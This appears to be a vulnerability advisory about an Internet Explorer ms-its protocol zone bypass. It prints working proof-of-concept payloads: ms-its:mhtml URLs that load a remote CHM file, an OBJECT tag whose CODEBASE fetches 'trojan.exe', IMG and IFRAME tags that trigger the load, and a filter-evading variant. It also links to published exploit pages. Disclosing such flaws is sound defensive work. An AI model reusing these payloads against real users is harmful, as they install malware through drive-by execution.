|
Microsoft Internet Explorer ITS Protocol Zone Bypass Vulnerability
**UPDATE: Symantec has determined that this vulnerability is being exploited "in the wild", in what appear to be targeted attacks. The following proof-of-concept has been supplied: ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm The following example demonstrates the exploitation of this issue: The attacker would create a script (ie; launch.html) containing a CLASSID exploit as a CHM such as: <OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111123' CODEBASE='trojan.exe'> The attacker would then utilize another script tag to execute the launch.html such as: <IMG SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IMG SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IMG SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IFRAME SRC='redirgen.php?url=URL:ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'> Additional proof-of-concepts have been published by http-equiv and Jelmer that demonstrate different payloads: http://www.malware.com/junk-de-lux.html http://ip3e83566f.speed.planet.nl/security/newone/exploit.htm Additional proof-of-concepts were provided in the "IE ms-its: and mk:@MSITStore: vulnerability" BugTraq post by Roozbeh Afrasiabi. Jelmer also released the following proof-of-concept example which may potentially bypass some filters due to using encoded characters in the exploit string: ms-its:mhtml:file://C:\foo.mht!${PATH}/EXPLOIT.CHM::/exploit.htm This issue is known to be exploited in the wild. |
|
|
Privacy Statement |